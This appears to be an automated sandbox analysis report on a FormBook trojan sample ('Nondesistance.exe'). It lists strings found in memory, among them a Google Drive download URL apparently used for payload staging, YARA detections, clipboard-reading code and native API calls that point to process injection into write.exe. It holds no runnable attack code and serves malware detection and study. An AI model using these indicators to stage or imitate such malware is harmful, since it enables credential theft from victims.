Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=downloadk
Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=downloadtW
Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/x
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://events.webnode.com/projects/-/events/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/bg/NameSiloLogo.png
Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://klientams.iv.lt/
Source: write.exe, 0000000B.00000002.25029531563.0000000002A4B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://login.li
Source: write.exe, 0000000B.00000002.25029531563.0000000002A4B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://login.lihttps://login.li
Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: write.exe, 0000000B.00000002.25030469735.0000000002DE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: write.exe, 0000000B.00000002.25030469735.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: write.exe, 0000000B.00000003.20563255735.0000000007C02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ogp.me/ns#
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=avocatmh.org
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-542MMSL
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/domenai/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/duomenu-centras/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/el-pasto-filtras/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/sertifikatai/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/talpinimo-planai/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iv.lt/vps-serveriai/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25038661256.00000000078C0000.00000004.00000800.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.namesilo.com
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25038661256.00000000078C0000.00000004.00000800.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.namesilo.com/domain/search-domains?query=l7aeh.us
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.namesilo.com/domain/search-domains?query=lm2ue.us
Source: write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.valentinaetommaso.it/page-not-found-404/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnode.com/it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campa
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature

Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827

Source: unknown	HTTPS traffic detected: 142.251.16.101:443 -> 192.168.11.30:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.253.62.132:443 -> 192.168.11.30:49828 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Nondesistance.exe

Code function: 4_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,

4_2_00405086

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325334E0 NtCreateMutant,LdrInitializeThunk,	9_2_325334E0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532B90 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_32532B90
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532D10 NtQuerySystemInformation,LdrInitializeThunk,	9_2_32532D10
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32534260 NtSetContextThread,	9_2_32534260
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32534570 NtSuspendThread,	9_2_32534570
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532A10 NtWriteFile,	9_2_32532A10
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532AC0 NtEnumerateValueKey,	9_2_32532AC0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532A80 NtClose,	9_2_32532A80
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532AA0 NtQueryInformationFile,	9_2_32532AA0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532B10 NtAllocateVirtualMemory,	9_2_32532B10
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532B00 NtQueryValueKey,	9_2_32532B00
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532B20 NtQueryInformationProcess,	9_2_32532B20
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532BC0 NtQueryInformationToken,	9_2_32532BC0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532BE0 NtQueryVirtualMemory,	9_2_32532BE0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532B80 NtCreateKey,	9_2_32532B80
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325338D0 NtGetContextThread,	9_2_325338D0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325329D0 NtWaitForSingleObject,	9_2_325329D0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325329F0 NtReadFile,	9_2_325329F0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532E50 NtCreateSection,	9_2_32532E50
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532E00 NtQueueApcThread,	9_2_32532E00
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532ED0 NtResumeThread,	9_2_32532ED0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532EC0 NtQuerySection,	9_2_32532EC0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532E80 NtCreateProcessEx,	9_2_32532E80
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532EB0 NtProtectVirtualMemory,	9_2_32532EB0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532F00 NtCreateFile,	9_2_32532F00
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532F30 NtOpenDirectoryObject,	9_2_32532F30
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532FB0 NtSetValueKey,	9_2_32532FB0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532C50 NtUnmapViewOfSection,	9_2_32532C50
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532C10 NtOpenProcess,	9_2_32532C10
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32533C30 NtOpenProcessToken,	9_2_32533C30
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532C30 NtMapViewOfSection,	9_2_32532C30
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532C20 NtSetInformationFile,	9_2_32532C20
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532CD0 NtEnumerateKey,	9_2_32532CD0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32532CF0 NtDelayExecution,	9_2_32532CF0

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Nondesistance.exe

Code function: 4_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_0040310F

Creates files inside the system directory

Source: C:\Users\user\Desktop\Nondesistance.exe

File created: C:\Windows\resources\0409

Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 4_2_004048C5	4_2_004048C5
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 4_2_004064CB	4_2_004064CB
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 4_2_00406CA2	4_2_00406CA2
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324C2245	9_2_324C2245
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324ED2EC	9_2_324ED2EC
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3250E310	9_2_3250E310
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BF330	9_2_325BF330
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324F1380	9_2_324F1380
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325AE076	9_2_325AE076
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3250B0D0	9_2_3250B0D0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B70F1	9_2_325B70F1
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324F00A0	9_2_324F00A0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3254717A	9_2_3254717A
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325C010E	9_2_325C010E
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324EF113	9_2_324EF113
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3259D130	9_2_3259D130
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325051C0	9_2_325051C0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3251B1E0	9_2_3251B1E0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325AD646	9_2_325AD646
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32524670	9_2_32524670
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3251C600	9_2_3251C600
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3259D62C	9_2_3259D62C
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BA6C0	9_2_325BA6C0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BF6F6	9_2_325BF6F6
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324FC6E0	9_2_324FC6E0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325736EC	9_2_325736EC
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32500680	9_2_32500680
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B6757	9_2_325B6757
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32502760	9_2_32502760
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3250A760	9_2_3250A760
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32500445	9_2_32500445
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325CA526	9_2_325CA526
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BF5C9	9_2_325BF5C9
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B75C6	9_2_325B75C6
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BEA5B	9_2_325BEA5B
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BCA13	9_2_325BCA13
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BFA89	9_2_325BFA89
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3251FAA0	9_2_3251FAA0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32500B10	9_2_32500B10
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BFB2E	9_2_325BFB2E
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32574BC0	9_2_32574BC0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32509870	9_2_32509870
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3251B870	9_2_3251B870
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324E6868	9_2_324E6868
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BF872	9_2_325BF872
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32503800	9_2_32503800
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325A0835	9_2_325A0835
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325028C0	9_2_325028C0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B78F3	9_2_325B78F3
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32516882	9_2_32516882
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325798B2	9_2_325798B2
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324C99E8	9_2_324C99E8
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324FE9A0	9_2_324FE9A0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BE9A6	9_2_325BE9A6
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32520E50	9_2_32520E50
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325A0E6D	9_2_325A0E6D
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B9ED2	9_2_325B9ED2
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324F2EE8	9_2_324F2EE8
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32501EB2	9_2_32501EB2
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B0EAD	9_2_325B0EAD
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BFF63	9_2_325BFF63
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3250CF00	9_2_3250CF00
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B1FC6	9_2_325B1FC6
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32506FE0	9_2_32506FE0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BEFBF	9_2_325BEFBF
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325AEC4C	9_2_325AEC4C
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32503C60	9_2_32503C60
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325B6C69	9_2_325B6C69
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325BEC60	9_2_325BEC60
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324F0C12	9_2_324F0C12
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3250AC20	9_2_3250AC20
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_32518CDF	9_2_32518CDF
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_3251FCE0	9_2_3251FCE0
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_325CACEB	9_2_325CACEB
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_006080CB	10_2_006080CB
